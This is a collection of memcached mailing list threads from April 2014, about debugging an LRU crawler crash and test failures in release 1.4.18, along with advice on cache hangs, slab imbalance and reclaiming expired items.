receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: 1.4.18
On Sat, Apr 19, 2014 at 12:43 PM, dormando dorma...@rydia.net wrote: Well, that learns me for trying to write software without the 10+ VM buildbots... The i386 one, can you include the output of stats settings, and also manually run: lru_crawler enable (or start with -o lru_crawler) then run stats settings again please? Really weird that it fails there, but not the lines before it looking for the OK while enabling it. As soon as I type lru_crawler enable, memcached crashes. I see this in dmesg. [189571.108397] traps: memcached-debug[31776] general protection ip:f7749988 sp:f47ff2d8 error:0 in libpthread-2.19.so[f7739000+18000] [189969.840918] traps: memcached-debug[2600] general protection ip:7f976510a1c8 sp:7f976254aed8 error:0 in libpthread-2.19.so[7f97650f9000+18000] [195892.554754] traps: memcached-debug[31871] general protection ip:f76f0988 sp:f46ff2d8 error:0 in libpthread-2.19.so[f76e+18000] Starting with -o lru_crawler also crashes. [195977.276379] traps: memcached-debug[2182] general protection ip:f7738988 sp:f75782d8 error:0 in libpthread-2.19.so[f7728000+18000] This is running both 32 bit and 64 bit executables on the same build box; note in the above dmesg output that two of them appear to be from 32-bit processes, and we also see a crash in what looks a lot like a 64 bit pointer address, if I'm reading this right... Uhh... is your cross compile goofed? Any chance you could start the memcached-debug binary under gdb and then crash it the same way? Get a full stack trace. Thinking if I even have a 32bit host left somewhere to test with... will have to spin up the VM's later, but a stacktrace might be enlightening anyway. Thanks! On the 64bit host, can you try increasing the sleep on t/lru-crawler.t:39 from 3 to 8 and try again? I was trying to be clever but that may not be working out. Didn't change anything, same two failures with the same output listed. I feel like something's a bit different between your two tests. In the first set, it's definitely not crashing for the 64bit test, but not working either. Is something weird going on with the second set of tests? You noted it seems to be running a 32bit binary still. Thanks! At least there're still people trying to maintain it for some distros... On Thursday, April 17, 2014 6:28:24 PM UTC-5, Dormando wrote: http://code.google.com/p/memcached/wiki/ReleaseNotes1418 I just tried building the Arch Linux package for this and got failures when running the test suite. This was the output from the 32-bit i686 build; I saw the same results building for x86_64. Let me know what other relevant information might help. # Failed test at t/lru-crawler.t line 45. # got: undef # expected: 'yes' t/lru-crawler.t .. Failed 96/189 subtests t/lru.t .. ok t/maxconns.t . ok t/multiversioning.t .. ok t/noreply.t .. ok t/slabs_reassign.t ... ok t/stats-conns.t .. ok t/stats-detail.t . ok t/stats.t ok t/touch.t ok t/udp.t .. ok t/unixsocket.t ... ok t/whitespace.t ... skipped: Skipping tests probably because you don't have git. Test Summary Report --- t/lru-crawler.t (Wstat: 13 Tests: 94 Failed: 1) Failed test: 94 Non-zero wait status: 13 Parse errors: Bad plan. You planned 189 tests but ran 94. Files=48, Tests=6982, 113 wallclock secs ( 0.76 usr 0.05 sys + 2.27 cusr 0.35 csys = 3.43 CPU) Result: FAIL Makefile:1376: recipe for target 'test' failed make: *** [test] Error 1 == ERROR: A failure occurred in check(). Aborting... Running out of a git checkout on x86_64, I get slightly different results: t/item_size_max.t ok t/line-lengths.t . ok t/lru-crawler.t .. 93/189 # Failed test 'slab1 now has 60 used chunks' # at t/lru-crawler.t line 57. # got: '90' # expected: '60' # Failed test 'slab1 has 30 reclaims' # at t/lru-crawler.t line 59. # got: '0' # expected: '30' # Looks like you failed 2 tests of 189. t/lru-crawler.t .. Dubious, test returned 2 (wstat 512, 0x200) Failed 2/189 subtests t/lru.t .. ok t/maxconns.t . ok t/multiversioning.t .. ok t/noreply.t .. ok t/slabs_reassign.t ... ok t/stats-conns.t .. ok t/stats-detail.t . ok t/stats.t ok t/touch.t ok
Re: 1.4.18
Er... reading comprehension fail. I meant 64bit binary still at the bottom there. On Sat, 19 Apr 2014, dormando wrote: On Sat, Apr 19, 2014 at 12:43 PM, dormando dorma...@rydia.net wrote: Well, that learns me for trying to write software without the 10+ VM buildbots... The i386 one, can you include the output of stats settings, and also manually run: lru_crawler enable (or start with -o lru_crawler) then run stats settings again please? Really weird that it fails there, but not the lines before it looking for the OK while enabling it. As soon as I type lru_crawler enable, memcached crashes. I see this in dmesg. [189571.108397] traps: memcached-debug[31776] general protection ip:f7749988 sp:f47ff2d8 error:0 in libpthread-2.19.so[f7739000+18000] [189969.840918] traps: memcached-debug[2600] general protection ip:7f976510a1c8 sp:7f976254aed8 error:0 in libpthread-2.19.so[7f97650f9000+18000] [195892.554754] traps: memcached-debug[31871] general protection ip:f76f0988 sp:f46ff2d8 error:0 in libpthread-2.19.so[f76e+18000] Starting with -o lru_crawler also crashes. [195977.276379] traps: memcached-debug[2182] general protection ip:f7738988 sp:f75782d8 error:0 in libpthread-2.19.so[f7728000+18000] This is running both 32 bit and 64 bit executables on the same build box; note in the above dmesg output that two of them appear to be from 32-bit processes, and we also see a crash in what looks a lot like a 64 bit pointer address, if I'm reading this right... Uhh... is your cross compile goofed? Any chance you could start the memcached-debug binary under gdb and then crash it the same way? Get a full stack trace. Thinking if I even have a 32bit host left somewhere to test with... will have to spin up the VM's later, but a stacktrace might be enlightening anyway. Thanks! On the 64bit host, can you try increasing the sleep on t/lru-crawler.t:39 from 3 to 8 and try again? I was trying to be clever but that may not be working out. Didn't change anything, same two failures with the same output listed. I feel like something's a bit different between your two tests. In the first set, it's definitely not crashing for the 64bit test, but not working either. Is something weird going on with the second set of tests? You noted it seems to be running a 32bit binary still. Thanks! At least there're still people trying to maintain it for some distros... On Thursday, April 17, 2014 6:28:24 PM UTC-5, Dormando wrote: http://code.google.com/p/memcached/wiki/ReleaseNotes1418 I just tried building the Arch Linux package for this and got failures when running the test suite. This was the output from the 32-bit i686 build; I saw the same results building for x86_64. Let me know what other relevant information might help. # Failed test at t/lru-crawler.t line 45. # got: undef # expected: 'yes' t/lru-crawler.t .. Failed 96/189 subtests t/lru.t .. ok t/maxconns.t . ok t/multiversioning.t .. ok t/noreply.t .. ok t/slabs_reassign.t ... ok t/stats-conns.t .. ok t/stats-detail.t . ok t/stats.t ok t/touch.t ok t/udp.t .. ok t/unixsocket.t ... ok t/whitespace.t ... skipped: Skipping tests probably because you don't have git. Test Summary Report --- t/lru-crawler.t (Wstat: 13 Tests: 94 Failed: 1) Failed test: 94 Non-zero wait status: 13 Parse errors: Bad plan. You planned 189 tests but ran 94. Files=48, Tests=6982, 113 wallclock secs ( 0.76 usr 0.05 sys + 2.27 cusr 0.35 csys = 3.43 CPU) Result: FAIL Makefile:1376: recipe for target 'test' failed make: *** [test] Error 1 == ERROR: A failure occurred in check(). Aborting... Running out of a git checkout on x86_64, I get slightly different results: t/item_size_max.t ok t/line-lengths.t . ok t/lru-crawler.t .. 93/189 # Failed test 'slab1 now has 60 used chunks' # at t/lru-crawler.t line 57. # got: '90' # expected: '60' # Failed test 'slab1 has 30 reclaims' # at t/lru-crawler.t line 59. # got: '0' # expected: '30' # Looks like you failed 2 tests of 189. t/lru-crawler.t .. Dubious, test returned 2 (wstat 512, 0x200) Failed 2/189 subtests t/lru.t .. ok t/maxconns.t
Re: 1.4.18
On Sat, 19 Apr 2014, Dan McGee wrote: On Sat, Apr 19, 2014 at 1:45 PM, dormando dorma...@rydia.net wrote: On Sat, Apr 19, 2014 at 12:43 PM, dormando dorma...@rydia.net wrote: Well, that learns me for trying to write software without the 10+ VM buildbots... The i386 one, can you include the output of stats settings, and also manually run: lru_crawler enable (or start with -o lru_crawler) then run stats settings again please? Really weird that it fails there, but not the lines before it looking for the OK while enabling it. As soon as I type lru_crawler enable, memcached crashes. I see this in dmesg. [189571.108397] traps: memcached-debug[31776] general protection ip:f7749988 sp:f47ff2d8 error:0 in libpthread-2.19.so[f7739000+18000] [189969.840918] traps: memcached-debug[2600] general protection ip:7f976510a1c8 sp:7f976254aed8 error:0 in libpthread-2.19.so[7f97650f9000+18000] [195892.554754] traps: memcached-debug[31871] general protection ip:f76f0988 sp:f46ff2d8 error:0 in libpthread-2.19.so[f76e+18000] Starting with -o lru_crawler also crashes. [195977.276379] traps: memcached-debug[2182] general protection ip:f7738988 sp:f75782d8 error:0 in libpthread-2.19.so[f7728000+18000] This is running both 32 bit and 64 bit executables on the same build box; note in the above dmesg output that two of them appear to be from 32-bit processes, and we also see a crash in what looks a lot like a 64 bit pointer address, if I'm reading this right... Uhh... is your cross compile goofed? Any chance you could start the memcached-debug binary under gdb and then crash it the same way? Get a full stack trace. Thinking if I even have a 32bit host left somewhere to test with... will have to spin up the VM's later, but a stacktrace might be enlightening anyway. Program received signal SIGSEGV, Segmentation fault. [Switching to Thread 0xf7dbfb40 (LWP 7)] 0xf7f7f988 in __lll_unlock_elision () from /usr/lib/libpthread.so.0 (gdb) bt #0 0xf7f7f988 in __lll_unlock_elision () from /usr/lib/libpthread.so.0 #1 0xf7f790e0 in __pthread_mutex_unlock_usercnt () from /usr/lib/libpthread.so.0 #2 0xf7f79bff in pthread_cond_wait@@GLIBC_2.3.2 () from /usr/lib/libpthread.so.0 #3 0x08061bfe in item_crawler_thread () #4 0xf7f75f20 in start_thread () from /usr/lib/libpthread.so.0 #5 0xf7ead94e in clone () from /usr/lib/libc.so.6 Holy crap lock elision. I have one machine with a haswell chip here, but I'll have to USB boot. Is getting an Arch liveimage especially time consuming? https://github.com/dormando/memcached/tree/crawler_fix Can you try this? The lock elision might've made my undefined behavior mistake of not holding a lock before initially waiting on the condition fatal. A further fix might be required, as it's possible someone could kill the do_etc flag before the thread fully starts and it'd drop out with the lock held. That would be an incredible feat though. Thanks! On the 64bit host, can you try increasing the sleep on t/lru-crawler.t:39 from 3 to 8 and try again? I was trying to be clever but that may not be working out. Didn't change anything, same two failures with the same output listed. I feel like something's a bit different between your two tests. In the first set, it's definitely not crashing for the 64bit test, but not working either. Is something weird going on with the second set of tests? You noted it seems to be running a 32bit binary still. I'm willing to ignore the 64-bit failures for now until we figure out the 32-bit ones. In any case, I wouldn't blame the cross-compile or toolchain, these have all been built in very clean, single architecture systemd-nspawn chroots. Thanks, I'm just trying to reason why it's failing in two different ways. The initial failure of finding 90 items when it expected 60 is a timing glitch, the other ones are this thread crashing the daemon. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: 1.4.18
Program received signal SIGSEGV, Segmentation fault. [Switching to Thread 0xf7dbfb40 (LWP 7)] 0xf7f7f988 in __lll_unlock_elision () from /usr/lib/libpthread.so.0 (gdb) bt #0 0xf7f7f988 in __lll_unlock_elision () from /usr/lib/libpthread.so.0 #1 0xf7f790e0 in __pthread_mutex_unlock_usercnt () from /usr/lib/libpthread.so.0 #2 0xf7f79bff in pthread_cond_wait@@GLIBC_2.3.2 () from /usr/lib/libpthread.so.0 #3 0x08061bfe in item_crawler_thread () #4 0xf7f75f20 in start_thread () from /usr/lib/libpthread.so.0 #5 0xf7ead94e in clone () from /usr/lib/libc.so.6 Holy crap lock elision. I have one machine with a haswell chip here, but I'll have to USB boot. Is getting an Arch liveimage especially time consuming? Not at all; if you download the latest install ISO (https://www.archlinux.org/download/) it is a live CD and you can boot straight into an Arch environment. You can do an install if you want, or just run live and install any necessary packages (`pacman -S base-devel gdb`) and go from there. Okay, seems like I'll have to give it a shot since this still isn't working well. https://github.com/dormando/memcached/tree/crawler_fix Can you try this? The lock elision might've made my undefined behavior mistake of not holding a lock before initially waiting on the condition fatal. A further fix might be required, as it's possible someone could kill the do_etc flag before the thread fully starts and it'd drop out with the lock held. That would be an incredible feat though. The good news here is now that we found our way to lock elision, both 64-bit and 32-bit builds (including one straight from git and outside the normal packaging build machinery) blow up in the same place. No segfault after applying this patch, so we've made progress. I love progress. Thanks! On the 64bit host, can you try increasing the sleep on t/lru-crawler.t:39 from 3 to 8 and try again? I was trying to be clever but that may not be working out. Didn't change anything, same two failures with the same output listed. I feel like something's a bit different between your two tests. In the first set, it's definitely not crashing for the 64bit test, but not working either. Is something weird going on with the second set of tests? You noted it seems to be running a 32bit binary still. I'm willing to ignore the 64-bit failures for now until we figure out the 32-bit ones. In any case, I wouldn't blame the cross-compile or toolchain, these have all been built in very clean, single architecture systemd-nspawn chroots. Thanks, I'm just trying to reason why it's failing in two different ways. The initial failure of finding 90 items when it expected 60 is a timing glitch, the other ones are this thread crashing the daemon. One machine was an i7 with TSX, thus the lock elision segfaults. The other is a much older Core2 machine. Enough differences there to cause problems, especially if we are dealing with threading-type things? Can you give me a summary of what the core2 machine gave you? I've built on a core2duo and nehalem i7 and they all work fine. I've also torture tested it on a brand new 16 core (2x8) xeon. On the i7 machine, I think we're still experiencing segfaults. Running just the LRU test; note the two undef values showing up again: $ prove t/lru-crawler.t t/lru-crawler.t .. 93/189 # Failed test 'slab1 now has 60 used chunks' # at t/lru-crawler.t line 57. # got: '90' # expected: '60' # Failed test 'slab1 has 30 reclaims' # at t/lru-crawler.t line 59. # got: '0' # expected: '30' # Failed test 'disabled lru crawler' # at t/lru-crawler.t line 69. # got: undef # expected: 'OK # ' # Failed test at t/lru-crawler.t line 72. # got: undef # expected: 'no' # Looks like you failed 4 tests of 189. t/lru-crawler.t .. Dubious, test returned 4 (wstat 1024, 0x400) Failed 4/189 subtests Changing the `sleep 3` to `sleep 8` gives non-deterministic results; two runs in a row were different. $ prove t/lru-crawler.t t/lru-crawler.t .. 93/189 # Failed test 'slab1 now has 60 used chunks' # at t/lru-crawler.t line 57. # got: '90' # expected: '60' # Failed test 'slab1 has 30 reclaims' # at t/lru-crawler.t line 59. # got: '0' # expected: '30' # Failed test 'ifoo29 == 'ok'' # at /home/dan/memcached/t/lib/MemcachedTest.pm line 59. # got: undef # expected: 'VALUE ifoo29 0 2 # ok # END # ' t/lru-crawler.t .. Failed 10/189 subtests Test Summary Report --- t/lru-crawler.t
Re: 1.4.18
On Sat, Apr 19, 2014 at 6:05 PM, dormando dorma...@rydia.net wrote: Once I wrapped my head around it, figured this one out. This cheap patch fixes the test, although I'm not sure it is the best actual solution. Because we don't set the lru_crawler_running flag on the main thread, but in the LRU thread itself, we have a race condition here. pthread_create() is by no means required to actually start the thread right away or schedule it, so the test itself asks too quickly if the LRU crawler is running, before the auxiliary thread has had the time to mark it as running. The sleep ensures we at least give that thread time to start. (Debugged by way of adding a print to STDERR statement in the while(1) loop. The only time I saw the test actually pass was when that loop caught and repeated itself for a while. It failed when it only ran once, which would make sense if the thread hadn't actually set the flag yet.) Ahh okay. Weird that you're able to see that, as the crawl command signals the thread. Hmm... no easy way to tell if it *had* fired or if it's not yet fired. The parts I thought really hard about seem to be doing okay, but the scaffolding I apparently goofed fairly bad, heh. I just pushed another commit to the crawler_fix tree, can you try it and see if it works with an unmodified test? We're good to go now, as far as I can tell. Ran the LRU test about 10 times on both machines I've been using today and it works every time now; no problems with the full test suite at this point either. Cool, thanks again. I just pushed these changes to master. I kinda want to find some other stuff to put in before shoveling out a .19 though. Are you a packager for Arch? Can you ship .18 with the patches? -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: Memcached somhow hangs or stoppes working
exhausted memory isn't going to cause it to pause... http://memcached.org/timeouts for the typical run-through of timeout problems. On Tue, 15 Apr 2014, Suraj Narkhede wrote: Or maybe its like you have exhausted your memory. Can you please check in the stats if there is any eviction_count? This problem will also get solved once the memcache is restarted. Suraj On Tue, Apr 15, 2014 at 1:14 PM, Jon Hauksson jon.hauks...@storytel.com wrote: Hi, thanks for the answers. We will try to upgrade. Yes, it does not work just to flush the memcached we have to restart them so maybe its the persistent connections Den måndagen den 14:e april 2014 kl. 19:50:01 UTC+2 skrev Jon Hauksson: Hi, I work at company where we use memcached and suddenly it stoppes working every like 3 days. We did not really catch the problem at first but now we have narrowed it down to memcached. Every time we restart our 2 memcached servers the system gets under control again. But when this happens we do not see any real problems in the logs etc...but it comes back after restart of the memcached. It does not work to just flush. If somebody has some information on what the problem could be it would be appreciated. We have 2 memcached servers on cent os and the startup options are: memcached -d -m 4096 -c 4096 -t 25 Thanks, Jon -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
LRU Crawler + stuff for 1.4.18
Yo, A bunch of good fixes from Steven Grimm went into master a few months ago, but I was too busy to finish the release. I've thrown in a few more things and we'll call this 1.4.18 shortly, unless someone finds a major flaw: Steven fixed a bunch of potential reference leaks, and added a stats conns command: https://github.com/memcached/memcached/pull/60 I made the hash algo selectable (existing jenkins, murmurhash3 to start with): https://github.com/memcached/memcached/pull/66 and an LRU crawler: https://github.com/memcached/memcached/pull/64 Just want to do two more tiny commits on the crawler before merging and releasing the whole thing I think. Unless someone has major ideas/etc? I spent a little bit of time benchmarking it and it seems to be functioning fine, but I didn't go into a ton of depth in the torture. If the feature isn't enabled the code paths don't do anything at all, so if something is broken it won't harm people. have fun, -Dormando -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
1.4.18
http://code.google.com/p/memcached/wiki/ReleaseNotes1418 -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: Memcached somhow hangs or stoppes working
What version are you using? If less than 1.4.17, please upgrade to the latest version. Also, -t 25 is a huge waste. Use -t 4 unless you're doing more than several hundred thousand requests per second. On Mon, 14 Apr 2014, Jon Hauksson wrote: Hi, I work at company where we use memcached and suddenly it stoppes working every like 3 days. We did not really catch the problem at first but now we have narrowed it down to memcached. Every time we restart our 2 memcached servers the system gets under control again. But when this happens we do not see any real problems in the logs etc...but it comes back after restart of the memcached. It does not work to just flush. If somebody has some information on what the problem could be it would be appreciated. We have 2 memcached servers on cent os and the startup options are: memcached -d -m 4096 -c 4096 -t 25 Thanks, Jon -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: Idea for reclaimation algo
Yes :) If I recall how that works, it's mildly similar to a few other things I've seen. Not super trivial to implement in a short period of time though. On Sat, 12 Apr 2014, Ryan McElroy wrote: Facebook implemented a visitor plugin system that we use to kick out already-expired items in our memcached instances. It runs at low priority and doesn't cause much latency that we notice. I should really get our version back out there so that others can see how we did it and implement it in the legit memcached :-) ~Ryan On Fri, Apr 11, 2014 at 11:08 AM, dormando dorma...@rydia.net wrote: s/pagging/padding/. gah. On Fri, 11 Apr 2014, dormando wrote: On Fri, 11 Apr 2014, Slawomir Pryczek wrote: Hi Dormando, more about the behaviour... when we're using normal memcached 1.4.13 16GB of memory gets exhausted in ~1h, then we start to have almost instant evictions of needed items (again these items aren't really needed individually, just when many of them gets evicted it's unacceptable because of how badly it affects the system) Almost instant evictions; so an item is stored, into a 16GB instance, and 120 seconds later is bumped out of the LRU? You'll probably just ignore me again, but isn't this just slab imbalance? Once your instance fills up there're probably a few slab classes with way too little memory in them. 'stats slabs' shows you per-slab eviction rates, along with the last accessed time of an item when it was evicted. What does this look like on one of your full instances? The slab rebalance system lets you plug in your own algorithm by running the page reassignment commands manually. Then you can smooth out the pages to where you think they should be. You mention long and short TTL, but what are they exactly? 120s and an hour? A week? I understand your desire to hack up something to solve this, but as you've already seen scanning memory to remove expired items is problematic: you're either going to do long walks from the tail, use a background thread and walk a probe item through, or walk through random slab pages looking for expired memory. None of these are very efficient and tend to rely on luck. A better way to do this is to bucket the memory by TTL. You have lots of pretty decent options for this (and someone else already suggested one): - In your client, use different memcached pools for major TTL buckets (ie; one instance only gets long items, one only short). Make sure the slabs aren't imbalanced via the slab rebalancer. - Are the sizes of the items correlated with their TTL? Are 120s items always in a ~300 byte range and longer items tend to be in a different byte range? You could use length pagging to shunt them into specific slab classes, separating them internally at the cost of some ram efficiency. - A storage engine (god I wish we'd made 1.6 work...) which allows bucketing by TTL ranges. You'd want a smaller set of slab classes to not waste too much memory here, but the idea is the same as running multiple individual instances, except internally splitting the storage engine instead and storing everything in the same hash table. Those three options completely avoid latency problems, the first one requires no code modifications and will work very well. The third is the most work (and will be tricky due to things like slab rebalance, and none of the slab class identification code will work). I would avoid it unless I were really bored and wanted to maintain my own fork forever. ~2 years ago i created another version based on that 1.4.13, than does garbage collection using custom stats handler. That version is able to be running on half of the memory for like 2 weeks, with 0 evictions. But we gave it full 16G and just restart it each week to be sure memory usage is kept in check, and we're not throwing away good data. Actually after changing -f1.25 to -f1.041 the slabs are filling with bad items much slower, because items are distributed better and this custom eviction function is able to catch more expired data. We have like 200GB of data evicted this way, daily. Because of volume (~40k req/s peak, much of it are writes) and differences in expire time LRU isn't able to reclaim items efficiently. Maybe people don't even realize the problem, but when we done some testing and turned off that custom eviction we had like 100% memory used
Re: Idea for reclaimation algo
Hey Dormando... Some quick question first... i have checked some Intel papers on their memcached fork and for 1.6 it seems that there's some rather big lock contention... have you thought about just gluing individual items to a thread, using maybe item hash or some configurable method... this way 2 threads won't be able to access same item at one time. I'm wondering what whould be problems with such approach because it seems rational at first glance, instead of locking the whole cache... im just curious. Is there some release plan for 1.6... i think 2-3 years ago it was in developement... you're getting closer to releasing it? 1.4 tree has much less lock contention than 1.6. I made repeated calls for people to help pull bugs out of 1.6 and was ignored, so I ended up continuing development against 1.4... There's no whole-cache lock in 1.4, there's a whole-LRU lock but the operations are a lot shorter. It's much much faster than the older code. Im not ignoring your posts, actually i read them but didn't want that my posts were too large. Actually we tried using several other things beside memcached. After switching from mysql with some memory tables to memcached ~2 years ago measured throughput went from 40-50 req/s to about 4000 r/s. Back then it was fine, then when traffic went higher the cache was no longer able to evict items almost at all. Changing infrastructure in project that was in developement for over 2 years is not easy thing. We also tested some other things like mongodb, redis back then... and we just CAN'T have this data to be hitting disks. Maybe now there are more options, but we are already considering golang or C rewrite for this part... we don't want to switch to some other shared memory-ish system, just be able to access data directly between calls and do locking ourselves. So, again, as for current solution, decisions about what tools we use were made a very long time ago, and are not easy to change now. Almost instant evictions; so an item is stored, into a 16GB instance, and 120 seconds later is bumped out of the LRU? Yes, the items we insert for TTL=120 to 500s are not able to hold in cache even for 60s, when we start to read/aggregate them, and are thrown away instead of garbage. I understand why is that... S - short TTL L - long TTL SSSLSSS - when we insert L item, no S items before L will be able to get reclaimed, with current algo, ever. Because new L items, will appear later too... for LRU to work optimially under high loads, every item should have nearly the same TTL in given slab. You could try to reclaim from top and bottom but this way one hold forever item would break the whole thing as soon as it't get to top. I understand this part, I just find it suspicious. Longest items in pool are set for 5-6h. And unfortunately item size is no way correlated to TTL. We eg. store UA analyze and geo data for 5h. These items are very short, as short as eg. impression counters. Ok. Any idea what the ratio to long to short is? like 10% 120s, 90% 5h, or reverse or whatever? You'll probably just ignore me again, but isn't this just slab imbalance? No it isn't... how in hell can slab imbalance happen over just 1h, without code changes ;) I can make slab imbalance happen in under 10 seconds. Not really the point: Slab pages are pulled from the global pool as-needed as memory fills. If your traffic has ebbs and flows, or tends to set a lot more items in one class than others it will immediately fill and others will starve. A better way to do this is to bucket the memory by TTL. You have lots of pretty decent options for this (and someone else already suggested one) Sure, if we knew back then we'd just create 3-4 memcached instances, add some API and shard the items based on requested TTL. You can't do that now? That doesn't really seem that hard and doesn't change the fundamental infrastructure... It'd be a lot easier than maintaining your own fork of memcached forever, I'd think. The slab rebalance system lets you plug in your own algorithm by running the page reassignment commands manually. Then you can smooth out the pages to where you think they should be. Sure, but that's actually not my problem... the problem is that im having full of expired items, so this would require some hacking of that slab rebalance algo (am i right?)... and it seems a little complicated to me, to be done in 3-4 days time. Bleh. A better way to do this is to bucket the memory by TTL. You have lots of pretty decent options for this (and someone else already suggested one)Haha, sure it's better :) We'd obviously have done that if we knew 2 years ago what we know now :) I actually wrote a quick code to redirect about 20% of traffic we're sending/receiving to/from memcached to my hacked version... for all times on screens you neet to do minus 5 minutes (we run memcached, then enabled the code 5
Re: Idea for reclaimation algo
On Sun, 13 Apr 2014, Slawomir Pryczek wrote: So high evictions when cleaning algo isn't enabled could be caused by slab imbalance due to high-memory slabs eating most of ram... and i just incorrectly assumed low TTL items are expired before high TTL items, because in such cases the cache didn't have enough memory to store all low TTL items, and both - low and high TTL's were evicted, interesting... yes. So you're saying if i set some item X, to evict it - i'd need to write AT LEAST as many new items as as X's slab contains, because item will be added on head, and you're removing from tail, right? yes. It's actually worse than that, since deleting items or fetching expired ones will make extra room, slowing it down. Actually, even worse than that still: During an allocation the *bottommost* item in the LRU is always checked for expiration before more memory is assigned. (this is the 'reclaimed' stat). So if you have a cache with only items of a TTL 60s, you will stop assigning memory if you set into the cache slower than they expire. Sending some slab stats, and TTL left for slab 1 where there are no evictions + slab 2 where there is plenty. Unfortunately i can't send dumps as these contain some sensitive data. http://img.liczniki.org/20140414/slabs_all_918-1397431358.png Can you *please* sent a text dump of stats items and stats slabs? Just grep out or censor what you don't want to share? Doing math against a picture is a huge annoyance. It's also missing important counters I'd like to look at. For ratio of long/short hard to tell... but most are definitely short. Slab class 3 has 1875968 total chunks in your example, which means in order to cause a 120s item to evict early you need to insert into *that slab class* at a rate of 15,000 items per second, unless it's a multi-hour item instead. In which case what you said is happening but reversed: lots of junk 120s items are causing 5hr items to evict, but after many minutes and definitely not mere seconds. Yes but as you can see this class only contains 15% of valid data and have plenty of evictions. The next class contains 7% valid data, but still have 4 evictions. Probably would be best just to keep TTLs same for all data... Your main complaint has been that 120s values don't persist for more than 60s, there's a 0% chance of any items in slab class 3 having a TTL of 120s. If you kept the TTL's all the same, what would they be? If they were all 120s and you rebalanced slabs, you'd probably never have a problem (but it seemed like you needed some data for longer). W dniu niedziela, 13 kwietnia 2014 21:12:43 UTC+2 użytkownik Dormando napisał: Hey Dormando... Some quick question first... i have checked some Intel papers on their memcached fork and for 1.6 it seems that there's some rather big lock contention... have you thought about just gluing individual items to a thread, using maybe item hash or some configurable method... this way 2 threads won't be able to access same item at one time. I'm wondering what whould be problems with such approach because it seems rational at first glance, instead of locking the whole cache... im just curious. Is there some release plan for 1.6... i think 2-3 years ago it was in developement... you're getting closer to releasing it? 1.4 tree has much less lock contention than 1.6. I made repeated calls for people to help pull bugs out of 1.6 and was ignored, so I ended up continuing development against 1.4... There's no whole-cache lock in 1.4, there's a whole-LRU lock but the operations are a lot shorter. It's much much faster than the older code. Im not ignoring your posts, actually i read them but didn't want that my posts were too large. Actually we tried using several other things beside memcached. After switching from mysql with some memory tables to memcached ~2 years ago measured throughput went from 40-50 req/s to about 4000 r/s. Back then it was fine, then when traffic went higher the cache was no longer able to evict items almost at all. Changing infrastructure in project that was in developement for over 2 years is not easy thing. We also tested some other things like mongodb, redis back then... and we just CAN'T have this data to be hitting disks. Maybe now there are more options, but we are already considering golang or C rewrite for this part... we don't want to switch to some other shared memory-ish system, just be able to access data directly between calls and do locking ourselves. So, again, as for current solution, decisions about what tools we use were made a very long time ago, and are not easy
Re: Idea for reclaimation algo
On Fri, 11 Apr 2014, Slawomir Pryczek wrote: Hi Dormando, more about the behaviour... when we're using normal memcached 1.4.13 16GB of memory gets exhausted in ~1h, then we start to have almost instant evictions of needed items (again these items aren't really needed individually, just when many of them gets evicted it's unacceptable because of how badly it affects the system) Almost instant evictions; so an item is stored, into a 16GB instance, and 120 seconds later is bumped out of the LRU? You'll probably just ignore me again, but isn't this just slab imbalance? Once your instance fills up there're probably a few slab classes with way too little memory in them. 'stats slabs' shows you per-slab eviction rates, along with the last accessed time of an item when it was evicted. What does this look like on one of your full instances? The slab rebalance system lets you plug in your own algorithm by running the page reassignment commands manually. Then you can smooth out the pages to where you think they should be. You mention long and short TTL, but what are they exactly? 120s and an hour? A week? I understand your desire to hack up something to solve this, but as you've already seen scanning memory to remove expired items is problematic: you're either going to do long walks from the tail, use a background thread and walk a probe item through, or walk through random slab pages looking for expired memory. None of these are very efficient and tend to rely on luck. A better way to do this is to bucket the memory by TTL. You have lots of pretty decent options for this (and someone else already suggested one): - In your client, use different memcached pools for major TTL buckets (ie; one instance only gets long items, one only short). Make sure the slabs aren't imbalanced via the slab rebalancer. - Are the sizes of the items correlated with their TTL? Are 120s items always in a ~300 byte range and longer items tend to be in a different byte range? You could use length pagging to shunt them into specific slab classes, separating them internally at the cost of some ram efficiency. - A storage engine (god I wish we'd made 1.6 work...) which allows bucketing by TTL ranges. You'd want a smaller set of slab classes to not waste too much memory here, but the idea is the same as running multiple individual instances, except internally splitting the storage engine instead and storing everything in the same hash table. Those three options completely avoid latency problems, the first one requires no code modifications and will work very well. The third is the most work (and will be tricky due to things like slab rebalance, and none of the slab class identification code will work). I would avoid it unless I were really bored and wanted to maintain my own fork forever. ~2 years ago i created another version based on that 1.4.13, than does garbage collection using custom stats handler. That version is able to be running on half of the memory for like 2 weeks, with 0 evictions. But we gave it full 16G and just restart it each week to be sure memory usage is kept in check, and we're not throwing away good data. Actually after changing -f1.25 to -f1.041 the slabs are filling with bad items much slower, because items are distributed better and this custom eviction function is able to catch more expired data. 